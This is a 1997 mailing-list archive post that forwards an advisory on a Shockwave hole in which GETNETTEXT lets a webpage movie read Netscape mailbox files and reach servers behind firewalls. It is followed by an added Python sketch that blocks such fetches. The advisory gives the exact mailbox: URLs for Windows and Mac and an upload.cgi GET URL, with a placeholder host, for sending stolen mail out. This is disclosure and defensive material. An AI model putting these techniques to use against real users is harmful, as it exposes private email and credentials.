Interesting People mailing list archives

IP: Shockware + Netscape Navigator: Shockwave Security


From: Dave Farber <farber () cis upenn edu>
Date: Fri, 14 Mar 1997 17:01:48 -0500

This seems real and the URL exists, so I believe it is real. Cautious Dave




_______________________________________________________________________________
Subject: SECURITY: Shockware + Netscape Navigator: Shockwave Security
From:    Scott Lystig Fritchie <fritchie () MR Net> at Internet
Date:    3/14/97  2:19 PM




Subject: BoS:       Shockwave Security Alert


http://www.webcomics.com/shockwave/




                           SHOCKWAVE SECURITY ALERT






   AKA :: How to use Shockwave to read people's Netscape email!


   10-Mar-97 --- reported by: David de Vitry


   What is this about?




       This is about a security hole in Shockwave that allows malicious
       webpage developers to create a Shockwave movie that will read
       through a user's emails, and potentially upload them to a server.
       All without the user knowing about it. In addition, there is a
       risk to internal Web servers behind corporate firewalls,
       regardless of the browser you use (Netscape or Internet Explorer),
       as long as you have the current release of Shockwave.




   Who could be affected?




       Users of Netscape 3.0 (and 2.0?) on Win 95 / NT/ Mac with
       Shockwave installed.  In addition, the user must not have upgraded
       to "Communicator", (this just changes the directory structure) and
       must use the Netscape browser to read their email. There may be
       other browsers / platforms affected by similar insecurities with
       Shockwave.






   How is this done?




       A developer can use Shockwave to access the user's Netscape email
       folders. This is done assuming the name and path to the mailbox on
       the user's hard drive. For example names such as: Inbox, Outbox,
       Sent and Trash are all default names for mail folders. The default
       path to the "Inbox" on Win 95/NT would be: "C:/Program
       Files/Netscape/Navigator/Mail/Inbox". Then the developer can use
       the Shockwave command "GETNETTEXT" to call Navigator to query the
       email folder for an email message. The results of this call can
       then be fed into a variable, and later processed and sent to a
       server. To access a message, for example, the first message in a
       user's Inbox, would be called using the following location:


       For Windows:
       mailbox:C:/Program Files/Netscape/Navigator/Mail/Inbox?number=0


       For MacOS (thanks Jeremy Traub)
       mailbox:/Macintosh%20HD/System%20Folder/Preferences/Netscape%20%C4/Mail/Inbox?number=0


       Note: if these links all give you an error (such as folder no
       longer exists), then you might not have anything to worry about.
       However, if you see an email message in a pop up window, and you
       have Shockwave installed, then you are vulnerable to this security
       hole.




   Show Me an example!

       Here it is, a Shockwave movie that will read your email. This
       will not work for everyone, it is currently only set up to work
       with Win95 / NT, but it could be extended to identify the browser
       (Jeremy Traub).


   Interesting, but what is the security hole?




       It doesn't stop at just the first messages of your inbox.
       A Shockwave program could increment through a user's entire inbox,
       outbox, sent, and trash email folder. This information could then
       be sent back to a server (using the GET method with a simple cgi
       program, i.e.
       http://www...com/upload.cgi?data=This_could_be_your_email_content_here),
       all without the user ever noticing. Here are just a few
       types of information that a malicious developer could obtain using
       this hole:
          + Your name and email
          + Your friends' names and emails
          + User IDs and passwords sent to you in email, and where and
            how to use them.
          + Personal email messages that you sent or received using
            Netscape






       The "GETNETTEXT" command also has other problems in that it can
       access other http servers, including ones that are not on the
       internet, i.e., ones that are behind a corporate firewall. That is
       if the movie is run from behind the firewall. This may be even a
       bigger problem than the email one, however it affects only
       corporate users.




   Help: What can I do to protect myself?




       There are a number of things that you could do to protect yourself
       from malicious shockwave movies:
          + Change the path to your mail folders
          + Don't use Netscape to read or send email
          + DeInstall Shockwave
          + Don't go to potentially hostile sites.






   What are people saying? -- please inform me of any other articles.
     * Wired article
     * Macromedia and Netscape have given me no official statements.
       However, they are both in communication with me regarding this
       issue. Macromedia did say that their newest product "Shockwave 6,"
       currently in pre-release, does fix this problem.
     * Microsoft did not want to talk with me about the issue, even
       though there are risks to their users. They just blew me off
       saying "There are obviously plenty of security bugs to go around."
       Followed by, "Great, we're checking it out now."






The hosting for this page was made possible by WebComics,
   Interverse and the author David de Vitry


------- End of Forwarded Message
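
The alert above describes a fetch command that accepts any location it is handed, including mailbox: URLs and HTTP servers behind a firewall. The following is an added sketch, not part of the forwarded alert and not Macromedia's or Netscape's actual fix, of the check a plugin's fetch API can apply before issuing a request: allow only http(s), and only the origin the movie itself was loaded from. The function names and the movies.example / intranet.corp.example hosts are hypothetical.

```python
from urllib.parse import urljoin, urlsplit

# Schemes a movie may fetch, mapped to their default ports (assumed policy).
ALLOWED_SCHEMES = {"http": 80, "https": 443}


def origin(url):
    """Return (scheme, host, port) for an http(s) URL, or None otherwise."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return None
    try:
        port = parts.port or ALLOWED_SCHEMES[parts.scheme]
    except ValueError:  # malformed port in the URL
        return None
    return (parts.scheme, parts.hostname, port)


def fetch_allowed(movie_url, target_url):
    """Decide whether a movie loaded from movie_url may fetch target_url."""
    movie = origin(movie_url)
    if movie is None:
        return (False, "movie origin is not http(s)")
    # Resolve relative references against the movie URL before checking.
    target = origin(urljoin(movie_url, target_url))
    if target is None:
        return (False, "scheme not allowed")   # mailbox:, file:, ...
    if target != movie:
        return (False, "cross-origin")         # e.g. an intranet server
    return (True, "same-origin")


# Constructed sample requests; the mailbox: location is the one quoted above.
MOVIE = "http://movies.example/demo.dcr"
SAMPLES = [
    "mailbox:C:/Program Files/Netscape/Navigator/Mail/Inbox?number=0",
    "file:///C:/Program Files/Netscape/Navigator/Mail/Inbox",
    "http://intranet.corp.example/phonebook",
    "scores.txt",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(fetch_allowed(MOVIE, sample), sample)
```
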

